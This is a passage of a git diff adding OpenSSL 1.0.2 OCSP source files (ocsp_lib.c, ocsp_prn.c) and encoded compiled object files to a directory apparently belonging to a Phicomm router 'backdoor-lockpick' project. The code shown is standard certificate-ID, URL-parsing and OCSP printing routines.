z07rh#OY;L@->)J6Yz_Rm8u%XoNB)=LjfLlw*PxF0F^Z1mmD3F8`=90(!0;2enq5*2
z{OTI`48U<-yv$)S)`O7649_#1=OVlzR+~4$<ez5pG*1EFmKyTgYv7o>Q6Je%)iH7y
zRDa6wtqiC63h>|8;K93BH9h}S13y{=f4v5NvIc&p27aLi-T?Mg)AL%u(GU5Fh978d
zh3cFd@~uq%8n$J4E{)WXPcr$rOrGXhoNDY|0cUx%J&|&Io955;kakUj`-ah+cQbK^
zd>(vw@zI2j+4z`)586AIEcb<1L{|k?MtzYxqw7-1B#AB!EpJsq(dA2)gaeUiL}?8L
zqNFvr-01eLx@$#*)yEC)PHrTuvn$rw*%PN@($TJD7p-CcxB=^vng@HMYdd<3o^(=+
zcEvVDQ^|C1Pj@;Q?W7lz@xwZr5=03v^F})~7>g~`tvA)tt*sm1F-FV{ME{IugDJf*
z-~DB@Ef9_Xb-7I)6H6q#(e`94kxUu0WwbP{Y)pX`hHN_7oxs(&$j)xG4|Pld0j+3o
z`--mXjIB3F;##VcfFt7V20J(=O#-V{MSC+^G?_~Eq)1vzX+4=vih?o*8coEs7>P#H
zS}cBFG~Rw+bX}~YbG+s_c{I_~A$SH`bRo(bmlt4FAiQGvvT&g604{<O80$vCll4mY
z!AArwvH{Z*7taokFJ?G|F~PHm;~|D45AFeuuNUyE1svzbg7Q=0$K`*BAe2h}pBXTf
z7x@bUj(1YdV}^Z?1^KUoAIBRQj{LX<jdK%h7vyC@ex`t5FW_N;r$N9w1RVMK`Q0n<
z$b$S+f_$TZKQGANB;dn>yj{TmD#+tkF1Pn%K_2f69RIwAyo8Q{f_@X{Z4z+2M{^!O
z!|{drl;a^m{!0SBTENBi>Jso91o<5d#~1pO^G{`0MAY-k0zO;7zaro(1YGn_H^Y%%
z^k=$;{0{_thQPnO20kp{;=CgQF6wy&8UzJjBLB1+c%}xvQ^4^~#r^g>0e1`dpn!||
zJc-{YP_SFnXW0Y_Uxeocd=`lCd4D0`9s!>^ag0ZlpTTfk7rdi$p80~jSHPDF@|e@O
zd|1Fmo;5XiHVSx?!1KI-PZ#iE0T=!AmVnO@<m=hFkNy<-r!gGuoh!)41$mc%ZxL|(
z?-6eAw*_2W#~%r}xbJogxTp`>hz0c&^FIaQfqLTaS3(?PAIGm@@x<uMc$&q*6cmQS
z<@r98DLRI;W;suDdH$WyULpT7YvXqY7B0{4_m3NJ86RQo7b|dnFF#&^^LzQb6*#|t
zJB56UbIbUE;;+E@efp6KoZmYSSK$19`9=lK?~%lv-rS|d*1{X^74+TCYpG;s%&jFi
zX~a#h7w)y`G;ybTuz})UH{2$vkbx0*yr-)R{@O&`-91{;4S)ZcNiQU<y}mo+?oIXd
zCR5sGHZa)^SIJmc(lGY_c*-yqO=MwGW@=%zBRrs3o4KPbhj$4Ky_Pa!RF1O`DGwvY
zGaJWpIy}>`+yp<wSy&@POFjQ!<N$kD&W||&Ise!3nA4CG_o7(%{HUK;`274GfKIHl
zuq%tUF#Y?=h*6O%+AYwo=06)=-k{t|pM;?Q(3O?`yB#o`A9K7|_OkggCy9mY&EI!G
zC$Ecgr~XU-uY*CDdMoWe&Bn_jDb%_C9Nr2QoWF9sgZ+WVQPEL3elv`%=D&94zxm8K
z^xtIo@$o$Vs?7~zL}m%Ig`LNESHV19IUdcdj6HzJy?FRR!T&-NOQo+-tlIdW;KqXT
Li18{vE64u}--!C{

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_lib.c
new file mode 100644
index 0000000..442a5b6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_lib.c
@@ -0,0 +1,290 @@
+/* ocsp_lib.c */
+/*
+ * Written by Tom Titchener <Tom_Titchener@groove.net> for the OpenSSL
+ * project.
+ */
+
+/*
+ * History: This file was transfered to Richard Levitte from CertCo by Kathy
+ * Weinhold in mid-spring 2000 to be included in OpenSSL or released as a
+ * patch kit.
+ */
+
+/* ====================================================================
+ * Copyright (c) 1998-2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <cryptlib.h>
+#include <openssl/objects.h>
+#include <openssl/rand.h>
+#include <openssl/x509.h>
+#include <openssl/pem.h>
+#include <openssl/x509v3.h>
+#include <openssl/ocsp.h>
+#include <openssl/asn1t.h>
+
+/* Convert a certificate and its issuer to an OCSP_CERTID */
+
+OCSP_CERTID *OCSP_cert_to_id(const EVP_MD *dgst, X509 *subject, X509 *issuer)
+{
+    X509_NAME *iname;
+    ASN1_INTEGER *serial;
+    ASN1_BIT_STRING *ikey;
+#ifndef OPENSSL_NO_SHA1
+    if (!dgst)
+        dgst = EVP_sha1();
+#endif
+    if (subject) {
+        iname = X509_get_issuer_name(subject);
+        serial = X509_get_serialNumber(subject);
+    } else {
+        iname = X509_get_subject_name(issuer);
+        serial = NULL;
+    }
+    ikey = X509_get0_pubkey_bitstr(issuer);
+    return OCSP_cert_id_new(dgst, iname, ikey, serial);
+}
+
+OCSP_CERTID *OCSP_cert_id_new(const EVP_MD *dgst,
+                              X509_NAME *issuerName,
+                              ASN1_BIT_STRING *issuerKey,
+                              ASN1_INTEGER *serialNumber)
+{
+    int nid;
+    unsigned int i;
+    X509_ALGOR *alg;
+    OCSP_CERTID *cid = NULL;
+    unsigned char md[EVP_MAX_MD_SIZE];
+
+    if (!(cid = OCSP_CERTID_new()))
+        goto err;
+
+    alg = cid->hashAlgorithm;
+    if (alg->algorithm != NULL)
+        ASN1_OBJECT_free(alg->algorithm);
+    if ((nid = EVP_MD_type(dgst)) == NID_undef) {
+        OCSPerr(OCSP_F_OCSP_CERT_ID_NEW, OCSP_R_UNKNOWN_NID);
+        goto err;
+    }
+    if (!(alg->algorithm = OBJ_nid2obj(nid)))
+        goto err;
+    if ((alg->parameter = ASN1_TYPE_new()) == NULL)
+        goto err;
+    alg->parameter->type = V_ASN1_NULL;
+
+    if (!X509_NAME_digest(issuerName, dgst, md, &i))
+        goto digerr;
+    if (!(ASN1_OCTET_STRING_set(cid->issuerNameHash, md, i)))
+        goto err;
+
+    /* Calculate the issuerKey hash, excluding tag and length */
+    if (!EVP_Digest(issuerKey->data, issuerKey->length, md, &i, dgst, NULL))
+        goto err;
+
+    if (!(ASN1_OCTET_STRING_set(cid->issuerKeyHash, md, i)))
+        goto err;
+
+    if (serialNumber) {
+        ASN1_INTEGER_free(cid->serialNumber);
+        if (!(cid->serialNumber = ASN1_INTEGER_dup(serialNumber)))
+            goto err;
+    }
+    return cid;
+ digerr:
+    OCSPerr(OCSP_F_OCSP_CERT_ID_NEW, OCSP_R_DIGEST_ERR);
+ err:
+    if (cid)
+        OCSP_CERTID_free(cid);
+    return NULL;
+}
+
+int OCSP_id_issuer_cmp(OCSP_CERTID *a, OCSP_CERTID *b)
+{
+    int ret;
+    ret = OBJ_cmp(a->hashAlgorithm->algorithm, b->hashAlgorithm->algorithm);
+    if (ret)
+        return ret;
+    ret = ASN1_OCTET_STRING_cmp(a->issuerNameHash, b->issuerNameHash);
+    if (ret)
+        return ret;
+    return ASN1_OCTET_STRING_cmp(a->issuerKeyHash, b->issuerKeyHash);
+}
+
+int OCSP_id_cmp(OCSP_CERTID *a, OCSP_CERTID *b)
+{
+    int ret;
+    ret = OCSP_id_issuer_cmp(a, b);
+    if (ret)
+        return ret;
+    return ASN1_INTEGER_cmp(a->serialNumber, b->serialNumber);
+}
+
+/*
+ * Parse a URL and split it up into host, port and path components and
+ * whether it is SSL.
+ */
+
+int OCSP_parse_url(const char *url, char **phost, char **pport, char **ppath,
+                   int *pssl)
+{
+    char *p, *buf;
+
+    char *host, *port;
+
+    *phost = NULL;
+    *pport = NULL;
+    *ppath = NULL;
+
+    /* dup the buffer since we are going to mess with it */
+    buf = BUF_strdup(url);
+    if (!buf)
+        goto mem_err;
+
+    /* Check for initial colon */
+    p = strchr(buf, ':');
+
+    if (!p)
+        goto parse_err;
+
+    *(p++) = '\0';
+
+    if (!strcmp(buf, "http")) {
+        *pssl = 0;
+        port = "80";
+    } else if (!strcmp(buf, "https")) {
+        *pssl = 1;
+        port = "443";
+    } else
+        goto parse_err;
+
+    /* Check for double slash */
+    if ((p[0] != '/') || (p[1] != '/'))
+        goto parse_err;
+
+    p += 2;
+
+    host = p;
+
+    /* Check for trailing part of path */
+
+    p = strchr(p, '/');
+
+    if (!p)
+        *ppath = BUF_strdup("/");
+    else {
+        *ppath = BUF_strdup(p);
+        /* Set start of path to 0 so hostname is valid */
+        *p = '\0';
+    }
+
+    if (!*ppath)
+        goto mem_err;
+
+    p = host;
+    if (host[0] == '[') {
+        /* ipv6 literal */
+        host++;
+        p = strchr(host, ']');
+        if (!p)
+            goto parse_err;
+        *p = '\0';
+        p++;
+    }
+
+    /* Look for optional ':' for port number */
+    if ((p = strchr(p, ':'))) {
+        *p = 0;
+        port = p + 1;
+    } else {
+        /* Not found: set default port */
+        if (*pssl)
+            port = "443";
+        else
+            port = "80";
+    }
+
+    *pport = BUF_strdup(port);
+    if (!*pport)
+        goto mem_err;
+
+    *phost = BUF_strdup(host);
+
+    if (!*phost)
+        goto mem_err;
+
+    OPENSSL_free(buf);
+
+    return 1;
+
+ mem_err:
+    OCSPerr(OCSP_F_OCSP_PARSE_URL, ERR_R_MALLOC_FAILURE);
+    goto err;
+
+ parse_err:
+    OCSPerr(OCSP_F_OCSP_PARSE_URL, OCSP_R_ERROR_PARSING_URL);
+
+ err:
+    if (buf)
+        OPENSSL_free(buf);
+    if (*ppath)
+        OPENSSL_free(*ppath);
+    if (*pport)
+        OPENSSL_free(*pport);
+    if (*phost)
+        OPENSSL_free(*phost);
+    return 0;
+
+}
+
+IMPLEMENT_ASN1_DUP_FUNCTION(OCSP_CERTID)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..847ab10613d052273a3598d27fdafa9d4cebc373
GIT binary patch
literal 5752
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_prn.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_prn.c
new file mode 100644
index 0000000..1834256
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ocsp/ocsp_prn.c
@@ -0,0 +1,300 @@
+/* ocsp_prn.c */
+/*
+ * Written by Tom Titchener <Tom_Titchener@groove.net> for the OpenSSL
+ * project.
+ */
+
+/*
+ * History: This file was originally part of ocsp.c and was transfered to
+ * Richard Levitte from CertCo by Kathy Weinhold in mid-spring 2000 to be
+ * included in OpenSSL or released as a patch kit.
+ */
+
+/* ====================================================================
+ * Copyright (c) 1998-2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <openssl/bio.h>
+#include <openssl/err.h>
+#include <openssl/ocsp.h>
+#include <openssl/pem.h>
+
+static int ocsp_certid_print(BIO *bp, OCSP_CERTID *a, int indent)
+{
+    BIO_printf(bp, "%*sCertificate ID:\n", indent, "");
+    indent += 2;
+    BIO_printf(bp, "%*sHash Algorithm: ", indent, "");
+    i2a_ASN1_OBJECT(bp, a->hashAlgorithm->algorithm);
+    BIO_printf(bp, "\n%*sIssuer Name Hash: ", indent, "");
+    i2a_ASN1_STRING(bp, a->issuerNameHash, V_ASN1_OCTET_STRING);
+    BIO_printf(bp, "\n%*sIssuer Key Hash: ", indent, "");
+    i2a_ASN1_STRING(bp, a->issuerKeyHash, V_ASN1_OCTET_STRING);
+    BIO_printf(bp, "\n%*sSerial Number: ", indent, "");
+    i2a_ASN1_INTEGER(bp, a->serialNumber);
+    BIO_printf(bp, "\n");
+    return 1;
+}
+
+typedef struct {
+    long t;
+    const char *m;
+} OCSP_TBLSTR;
+
+static const char *table2string(long s, const OCSP_TBLSTR *ts, int len)
+{
+    const OCSP_TBLSTR *p;
+    for (p = ts; p < ts + len; p++)
+        if (p->t == s)
+            return p->m;
+    return "(UNKNOWN)";
+}
+
+const char *OCSP_response_status_str(long s)
+{
+    static const OCSP_TBLSTR rstat_tbl[] = {
+        {OCSP_RESPONSE_STATUS_SUCCESSFUL, "successful"},
+        {OCSP_RESPONSE_STATUS_MALFORMEDREQUEST, "malformedrequest"},
+        {OCSP_RESPONSE_STATUS_INTERNALERROR, "internalerror"},
+        {OCSP_RESPONSE_STATUS_TRYLATER, "trylater"},
+        {OCSP_RESPONSE_STATUS_SIGREQUIRED, "sigrequired"},
+        {OCSP_RESPONSE_STATUS_UNAUTHORIZED, "unauthorized"}
+    };
+    return table2string(s, rstat_tbl, 6);
+}
+
+const char *OCSP_cert_status_str(long s)
+{
+    static const OCSP_TBLSTR cstat_tbl[] = {
+        {V_OCSP_CERTSTATUS_GOOD, "good"},
+        {V_OCSP_CERTSTATUS_REVOKED, "revoked"},
+        {V_OCSP_CERTSTATUS_UNKNOWN, "unknown"}
+    };
+    return table2string(s, cstat_tbl, 3);
+}
+
+const char *OCSP_crl_reason_str(long s)
+{
+    static const OCSP_TBLSTR reason_tbl[] = {
+        {OCSP_REVOKED_STATUS_UNSPECIFIED, "unspecified"},
+        {OCSP_REVOKED_STATUS_KEYCOMPROMISE, "keyCompromise"},
+        {OCSP_REVOKED_STATUS_CACOMPROMISE, "cACompromise"},
+        {OCSP_REVOKED_STATUS_AFFILIATIONCHANGED, "affiliationChanged"},
+        {OCSP_REVOKED_STATUS_SUPERSEDED, "superseded"},
+        {OCSP_REVOKED_STATUS_CESSATIONOFOPERATION, "cessationOfOperation"},
+        {OCSP_REVOKED_STATUS_CERTIFICATEHOLD, "certificateHold"},
+        {OCSP_REVOKED_STATUS_REMOVEFROMCRL, "removeFromCRL"}
+    };
+    return table2string(s, reason_tbl, 8);
+}
+
+int OCSP_REQUEST_print(BIO *bp, OCSP_REQUEST *o, unsigned long flags)
+{
+    int i;
+    long l;
+    OCSP_CERTID *cid = NULL;
+    OCSP_ONEREQ *one = NULL;
+    OCSP_REQINFO *inf = o->tbsRequest;
+    OCSP_SIGNATURE *sig = o->optionalSignature;
+
+    if (BIO_write(bp, "OCSP Request Data:\n", 19) <= 0)
+        goto err;
+    l = ASN1_INTEGER_get(inf->version);
+    if (BIO_printf(bp, "    Version: %lu (0x%lx)", l + 1, l) <= 0)
+        goto err;
+    if (inf->requestorName != NULL) {
+        if (BIO_write(bp, "\n    Requestor Name: ", 21) <= 0)
+            goto err;
+        GENERAL_NAME_print(bp, inf->requestorName);
+    }
+    if (BIO_write(bp, "\n    Requestor List:\n", 21) <= 0)
+        goto err;
+    for (i = 0; i < sk_OCSP_ONEREQ_num(inf->requestList); i++) {
+        one = sk_OCSP_ONEREQ_value(inf->requestList, i);
+        cid = one->reqCert;
+        ocsp_certid_print(bp, cid, 8);
+        if (!X509V3_extensions_print(bp,
+                                     "Request Single Extensions",
+                                     one->singleRequestExtensions, flags, 8))
+            goto err;
+    }
+    if (!X509V3_extensions_print(bp, "Request Extensions",
+                                 inf->requestExtensions, flags, 4))
+        goto err;
+    if (sig) {
+        X509_signature_print(bp, sig->signatureAlgorithm, sig->signature);
+        for (i = 0; i < sk_X509_num(sig->certs); i++) {
+            X509_print(bp, sk_X509_value(sig->certs, i));
+            PEM_write_bio_X509(bp, sk_X509_value(sig->certs, i));
+        }
+    }
+    return 1;
+ err:
+    return 0;
+}
+
+int OCSP_RESPONSE_print(BIO *bp, OCSP_RESPONSE *o, unsigned long flags)
+{
+    int i, ret = 0;
+    long l;
+    OCSP_CERTID *cid = NULL;
+    OCSP_BASICRESP *br = NULL;
+    OCSP_RESPID *rid = NULL;
+    OCSP_RESPDATA *rd = NULL;
+    OCSP_CERTSTATUS *cst = NULL;
+    OCSP_REVOKEDINFO *rev = NULL;
+    OCSP_SINGLERESP *single = NULL;
+    OCSP_RESPBYTES *rb = o->responseBytes;
+
+    if (BIO_puts(bp, "OCSP Response Data:\n") <= 0)
+        goto err;
+    l = ASN1_ENUMERATED_get(o->responseStatus);
+    if (BIO_printf(bp, "    OCSP Response Status: %s (0x%lx)\n",
+                   OCSP_response_status_str(l), l) <= 0)
+        goto err;
+    if (rb == NULL)
+        return 1;
+    if (BIO_puts(bp, "    Response Type: ") <= 0)
+        goto err;
+    if (i2a_ASN1_OBJECT(bp, rb->responseType) <= 0)
+        goto err;
+    if (OBJ_obj2nid(rb->responseType) != NID_id_pkix_OCSP_basic) {
+        BIO_puts(bp, " (unknown response type)\n");
+        return 1;
+    }
+
+    i = ASN1_STRING_length(rb->response);
+    if (!(br = OCSP_response_get1_basic(o)))
+        goto err;
+    rd = br->tbsResponseData;
+    l = ASN1_INTEGER_get(rd->version);
+    if (BIO_printf(bp, "\n    Version: %lu (0x%lx)\n", l + 1, l) <= 0)
+        goto err;
+    if (BIO_puts(bp, "    Responder Id: ") <= 0)
+        goto err;
+
+    rid = rd->responderId;
+    switch (rid->type) {
+    case V_OCSP_RESPID_NAME:
+        X509_NAME_print_ex(bp, rid->value.byName, 0, XN_FLAG_ONELINE);
+        break;
+    case V_OCSP_RESPID_KEY:
+        i2a_ASN1_STRING(bp, rid->value.byKey, V_ASN1_OCTET_STRING);
+        break;
+    }
+
+    if (BIO_printf(bp, "\n    Produced At: ") <= 0)
+        goto err;
+    if (!ASN1_GENERALIZEDTIME_print(bp, rd->producedAt))
+        goto err;
+    if (BIO_printf(bp, "\n    Responses:\n") <= 0)
+        goto err;
+    for (i = 0; i < sk_OCSP_SINGLERESP_num(rd->responses); i++) {
+        if (!sk_OCSP_SINGLERESP_value(rd->responses, i))
+            continue;
+        single = sk_OCSP_SINGLERESP_value(rd->responses, i);
+        cid = single->certId;
+        if (ocsp_certid_print(bp, cid, 4) <= 0)
+            goto err;
+        cst = single->certStatus;
+        if (BIO_printf(bp, "    Cert Status: %s",
+                       OCSP_cert_status_str(cst->type)) <= 0)
+            goto err;
+        if (cst->type == V_OCSP_CERTSTATUS_REVOKED) {
+            rev = cst->value.revoked;
+            if (BIO_printf(bp, "\n    Revocation Time: ") <= 0)
+                goto err;
+            if (!ASN1_GENERALIZEDTIME_print(bp, rev->revocationTime))
+                goto err;
+            if (rev->revocationReason) {
+                l = ASN1_ENUMERATED_get(rev->revocationReason);
+                if (BIO_printf(bp,
+                               "\n    Revocation Reason: %s (0x%lx)",
+                               OCSP_crl_reason_str(l), l) <= 0)
+                    goto err;
+            }
+        }
+        if (BIO_printf(bp, "\n    This Update: ") <= 0)
+            goto err;
+        if (!ASN1_GENERALIZEDTIME_print(bp, single->thisUpdate))
+            goto err;
+        if (single->nextUpdate) {
+            if (BIO_printf(bp, "\n    Next Update: ") <= 0)
+                goto err;
+            if (!ASN1_GENERALIZEDTIME_print(bp, single->nextUpdate))
+                goto err;
+        }
+        if (BIO_write(bp, "\n", 1) <= 0)
+            goto err;
+        if (!X509V3_extensions_print(bp,
+                                     "Response Single Extensions",
+                                     single->singleExtensions, flags, 8))
+            goto err;
